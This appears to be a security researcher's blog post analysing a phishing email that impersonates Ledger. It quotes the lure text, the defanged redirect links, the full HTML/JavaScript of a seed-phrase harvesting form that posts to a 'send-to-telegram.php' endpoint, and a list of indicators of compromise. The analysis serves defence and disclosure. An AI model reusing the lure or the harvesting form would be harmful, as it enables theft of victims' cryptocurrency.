Phishing for hardware wallet keys

Publisert av Harald
phishing blockchain harware wallet

One of my honeypot emails caught an interesting phishing email today:

From: Ledger <info.ledger[@]planet[.]com>
To: ******************
Subject: This is an automated email.
Date: 25 Sep 2024 04:04:11 +0200

    Dear customer,



    This is an automated email to inform you that 24-Word Seed Recovery to
    Electrum is initiated

    Please note that it can up to 24 hours to deliver all the funds to your new
    wallet. After that your funds cannot be accessed by Ledger hardware wallet
    anymore.

    If it wasn't you, report your recovery phrase immediately so our team can
    freeze the process in time. Otherwise just ignore thi email.

                                  [It wasn't me]



    We trust this information is sufficient.

    Do you have any questions about updating your details?
    Visit ledger[.]com/support/articles/How-to-update-my-profile.


                                  [512x512bb]

                                 © 2024 Ledger

                              support[@]ledger[.]com

Now, there's a couple of interesting things here:

It obviously targets users of hardware cryptocurrency wallets from Ledger. These are protected by a 24 word seed phrase that is used to derive your secret key. You should of course never reveal this phrase to anyone as that will give them full access to your funds on whatever blockchain you're using.

The link [It wasn't me] does of course not lead to Ledgers site. The underlying HTML code is:

<a href="hxxps://www[.]khojholidays[.]com/reddod.html">
                  <a style="..." href="hxxps://jinkrupa[.]com/wp-admin/readme.html">It wasn't me</a>

I'm not sure if the first (unterminated) anchor element is intentional or not, or how different HTML rendering engines will relate to it. In any case, both the links lead to identical fake reCAPTCHA pages, that when you click the checkbox redirects to ./wp-backup.php on the same site. This again redirects further to a form on a different site for entering the seed phrase. When submitting the form, it invokes an action with the suggestive name send-to-telegram.php.

Interestingly enough, the comments in the HTML/JavaScript code that renders the form is in a mixture of English and Dutch.

    <div class="container">
        <img src="hxxps://i[.]gyazo[.]com/b8fc2d6178e48c79ee3049bf389c5dc3.png" alt="Ledger Logo" class="ledger-logo">
        <h1>Ledger Recovery</h1>
        <p>Choose the length of your security phrase.</p>

        <select id="wordCount" onchange="generateInputFields()">
            <option value="12">12 words</option>
            <option value="18">18 words</option>
            <option value="24">24 words</option>
        </select>

        <form method="POST" action="send-to-telegram.php">
            <div id="wordInputContainer" class="word-input-container"></div>
            <button type="button" class="submit-btn" onclick="submitWords()">Continue</button>
        </form>
    </div>

    <script>
        function generateInputFields() {
            const wordCount = document.getElementById('wordCount').value;
            const container = document.getElementById('wordInputContainer');
            container.innerHTML = ''; // Clear existing fields

            for (let i = 1; i <= wordCount; i++) {
                const input = document.createElement('input');
                input.type = 'text';
                input.className = 'word-input';
                input.placeholder = i + '.'; // Placeholder showing the word number
                input.id = 'word' + i; // Unique ID for each input
                container.appendChild(input);
            }
        }

        function submitWords() {
            const wordCount = document.getElementById('wordCount').value;
            let words = [];

            for (let i = 1; i <= wordCount; i++) {
                const word = document.getElementById('word' + i).value; // Gebruik de standaard ID
                words.push(word); // Voeg het woord toe aan de array
            }

            // Maak een verborgen invoerveld om de woorden als array door te geven
            const hiddenInput = document.createElement('input');
            hiddenInput.type = 'hidden';
            hiddenInput.name = 'words[]'; // De naam als array
            hiddenInput.value = JSON.stringify(words); // Converteer de array naar JSON
            document.querySelector('form').appendChild(hiddenInput);

            // Dien het formulier in
            document.querySelector('form').submit();
        }

        // Initialiseer met 24 woorden
        generateInputFields();
    </script>

Above you can see the surprisingly clear and well documented code that generates the input form, and passes the typed in value to the send-to-telegram.php endpoint. This will most likely post any seed phrase to a telegram channel monitored by whoever is behind this phishing campaign.

IOC's

  • info.ledger[@]planet[.]com
  • hxxps://www[.]khojholidays[.]com/reddod.html
  • hxxps://www[.]khojholidays[.]com/wp-backup.php
  • hxxps://jinkrupa[.]com/wp-admin/readme.html
  • hxxps://jinkrupa[.]com/wp-admin/wp-backup.php
  • hxxps://firmwareapp[.]myvnc[.]com/ld
  • hxxps://1edger[.]sytes[.]net/ld

Support my work!

If you would like to support my work analyzing exploits and auditing open source projects for vulnerabilities, you can do so by donating any amount you feel like via stripe or Liberapay using the buttons below.

I'm also available for hire!

Send me an email, or contact me on the fediverse, and let me know what I can do for you.